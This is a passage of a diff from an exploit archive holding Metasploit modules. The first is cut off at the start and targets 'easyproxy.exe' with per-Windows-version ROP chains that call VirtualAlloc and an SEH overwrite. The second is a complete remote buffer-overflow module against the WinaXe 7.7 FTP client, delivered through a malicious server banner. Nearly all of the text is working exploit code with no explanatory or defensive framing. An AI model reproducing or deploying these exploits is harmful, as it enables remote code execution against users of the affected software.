'DefaultTarget'=> 0))
end
def exploit
connect
rop_gadgets =''
if target.name =~ /Vista 32bit/
print_good("Building Windows Vista Rop Chain")
rop_gadgets =
[
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x0043fb03,
0x00454559, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x00462589, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x004543b2, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417771, # & push esp # ret 0x1C [easyproxy.exe]
0x0046764d, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x004532e5, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x00486fac, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x0044fc45, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0045460d, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *46
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
if target.name =~ /7 32bit/
print_good('Building Windows 7 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047da72, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x00450e40, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417865, # & push esp # ret 0x1C [easyproxy.exe]
0x0046934a, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x0045a5b4, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x0047a3bf, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x00453ce6, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00478ecd, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *26
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
sleep(5)
handler
disconnect
end
if target.name =~ /8.1 32bit/
print_good('Building Windows 8 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047da72, # POP EAX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x004510a3, # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x00450e40, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417865, # & push esp # ret 0x1C [easyproxy.exe]
0x0046934a, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x0045a5b4, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # size
0x0047a3bf, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x00453ce6, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00478ecd, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *2
sploit << rop_gadgets
sploit << payload.encoded
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
if target.name =~ /10 32bit/
print_good('Building Windows 10 Rop Chain')
rop_gadgets =
[
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x0047f1de, # POP EBX # RETN [easyproxy.exe]
0x00489210, # ptr to &VirtualAlloc() [IAT easyproxy.exe]
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x41414141, # Filler (compensate)
0x00438d30, # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x004768eb, # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]
0x004676b0, # POP EBP # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x00417771, # & push esp # ret 0x1C [easyproxy.exe]
0x0046bf38, # POP EBX # RETN [easyproxy.exe]
0x00000001, # 0x00000001-> ebx
0x00481477, # POP EBX # RETN [easyproxy.exe]
0x00001000, # 0x00001000-> edx
0x0045a4ec, # XOR EDX,EDX # RETN [easyproxy.exe]
0x0045276e, # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]
0x00000001, # Filler (compensate)
0x00488098, # POP ECX # RETN [easyproxy.exe]
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x41414141, # Filler (RETN offset compensation)
0x00000040, # 0x00000040-> ecx
0x0044ca38, # POP EDI # RETN [easyproxy.exe]
0x0043fb03, # RETN (ROP NOP) [easyproxy.exe]
0x00454559, # POP EAX # RETN [easyproxy.exe]
0x90909090, # nop
0x0047d30f, # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]
].flatten.pack('V*')
print_good('Building Exploit...')
sploit = "\x90" *2
sploit << rop_gadgets
sploit << payload.encoded
sploit << make_nops(target['Nops'])
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
sploit << generate_seh_record(target.ret)
print_good('Sending exploit...')
sock.put(sploit)
print_good('Exploit Sent...')
handler
disconnect
end
end
end

71
platforms/windows/remote/40767.rb Executable file
View file

@ -0,0 +1,71 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'WinaXe 7.7 FTP Client Remote Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the WinaXe 7.7 FTP client.
This issue is triggered when a client connects to the server and is
expecting the Server Ready response.
},
'Author' =>
[
'Chris Higgins', # msf Module -- @ch1gg1ns
'hyp3rlinx' # Original discovery
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '40693'],
[ 'URL', 'http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows Universal',
{
'Offset' => 2065,
'Ret' => 0x68017296 # push esp # ret 0x04 WCMDPA10.dll
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Nov 03 2016',
'DefaultTarget' => 0))
end
def on_client_unknown_command(c, _cmd, _arg)
c.put("200 OK\r\n")
end
def on_client_connect(c)
print_status("Client connected...")
sploit = rand_text(target['Offset'])
sploit << [target.ret].pack('V')
sploit << make_nops(10)
sploit << payload.encoded
sploit << make_nops(20)
c.put("220" + sploit + "\r\n")
c.close
end
end